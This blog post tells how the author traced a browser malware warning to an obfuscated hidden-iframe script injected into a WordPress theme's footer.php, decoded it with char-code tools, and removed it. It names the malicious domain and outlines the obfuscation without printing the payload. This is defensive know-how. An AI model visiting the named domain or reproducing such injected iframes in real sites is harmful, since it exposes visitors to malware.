A few months ago, I got an email from a family member that told me that when they visited my blog, they received a “malicious software” warning. I found this very odd, since I visit my own blog fairly regularly and hadn’t noticed anything out of the ordinary. I found out that the issue only appeared with Safari for the Mac. The thing is, I rarely used, Safari on my Mac since my default cross-platform browser is Firefox. So I fired up Safari, and sure enough, I was greeted with the following warning:
My website contains “malware” or “malicious software”??? HUH?!! WHAT!!! The whole idea of my blog is to HELP people get out of computer issues, not cause them. So, of course, I panicked. Clicking through the only link on the warning page (which happened to be “ssl-google-analytics.com“) gave me the following information:
I found this very odd since while I was indeed running Google Analytics code, the domain that was showing in the warning looked a bit strange. So I followed the link at the bottom and requested a review of my site using the Google Webmaster Tools. Note that the site in question was not my domain.Â The review of the site is a process that can take several weeks so I submitted and assumed that it had occurred and all had been taken care of.
Also note, that if you try to visit (DON’T CLICK THIS LINK UNLESS YOU HAVE ANTI-VIRUS, ANTI-PHISHING OR MALWARE PROTECTION) >>http://ssl-google-analytics.com<<, it has already been flagged as a malicious site by some providers, Anti-Virus software and browsers so you should be ok but just in case, I wouldn’t click through it. It does look like the Google Analytics site so be careful.
This is a side-by-side of the REAL Google Analytics site (http://www.google.com/analytics/) on the top and the Phishing Site on the bottom as viewed within Internet Explorer 7. Note the copyright dates are off (attention to detail, hackers!)
If you visited the site in FireFox 3, you get the following warning (Note: there was NO WARNING in IE7):
Last night, however, I found that my blog still was producing errors. This was somewhat concerning as it was reported by a few people. Also, when my wife went to my blog, she was blocked by Kaspersky Internet Security with the following error:
I just didn’t get it. There was some sort of “infection” happening. But how do you figure out what is infected on a website if you don’t have full access to the machine that it is on?
How to Detect
I decided to really start digging and tried to think back if I had installed any new plugins recently on my blog. I disabled a few, one by one, and then kept testing to see if Kaspersky threw any more alerts. The process was long and tedious and didn’t produce any positive results.
So, then I decided to try activating different themes to see if perhaps a theme was infected. When I tried the WordPress default theme, NO alert was thrown. Now I was getting somewhere. Something within my theme was infected. How to test that? On a whim, I decided to do a full download of my entire blog, and run a virus scan on all of those files.
BINGO! Kaspersky found that my “footer.php” page was infected with the “HEUR:Trojan.Script.Iframer” virus. (Despite what I did find on the Kaspersky forum, this was a real threat and not a “false positive” as a few of the forum posts indicated.) Kaspersky has a solid Anti-Virus and Internet Security program but you can also try AVG that has a free version that may work as well. Other virus software may work on detecting malicious code within PHP files. I know for a fact that Kaspersky was able to detect and remove both the infection on the PHP page as well as block an infected site.
I started looking at the code a bit more (again, I have never taking any programming so I was guessing a bit here) and saw the reference to the number “3” within the code. Also, I started thinking about the site that was showing up as being malware (“ssl-google-analytics.com”). I decided to plug that bad URL into Uncle Jim’s Utility. The output was interesting: “115, 115, 108, 45, 103, 111, 111, 103, 108, 101, 45, 97, 110, 97, 108, 121, 116, 105, 99, 115, 46, 99, 111, 109, 47”. I looked for the repetitions of “115, 115” in the original block above and found it, as well as all of the rest of the number. For numbers that were only two digits, I simply added a “0” so “45” became “045”. That is where the “3” came into play. I figured that each group of 3 numbers actually represented a character.
I took the original block of numbers and then manually added a comma after every third number so that I had groups of 3 digits. I then took that long list of numbers and plugged it into Uncle Jim’s CharCode Translator and got back the malware hacker code that was causing all of my issues. Note, I won’t show the resulting code in this post. If you want to try it, you can do it yourself but it basically launched a 0 pixel by 0 pixel hidden iFrame that went to the “ssl-google-analytics.com” URL.
The Cure & Prevention
As I mentioned before, once the file containing the malicious code is identified, it is very easy to correct. Simply remove the script that is in there. It’s that easy. I’m not entirely sure how the code got there, nor how to completely prevent it from happening again. But I do believe that it has to do with “Code Injection” (which you can read about at length on Wikipedia). I have also come across a “firewall plugin” that is supposed to prevent code injection (comes complete with email alerts as well). It’s called: WordPress Firewall and is written by SEO Eggheads. I honestly don’t know if this plugin really does its job or not but I have definitely seen some alerts. Also, when I as activating and deactivating my themes to test, I got alerts when my infected theme was activated.
Don’t ignore any reports from your users of odd behavior within your site. Take some time to check it out and don’t install any plugins that seem a bit odd or from 3rd party sites.
Did you find this solution useful? If so: [paypal-donation reference=”Site hacker code”]
HTD Says: Keep your blogs safe. A bit of prevention will do you and your users some good!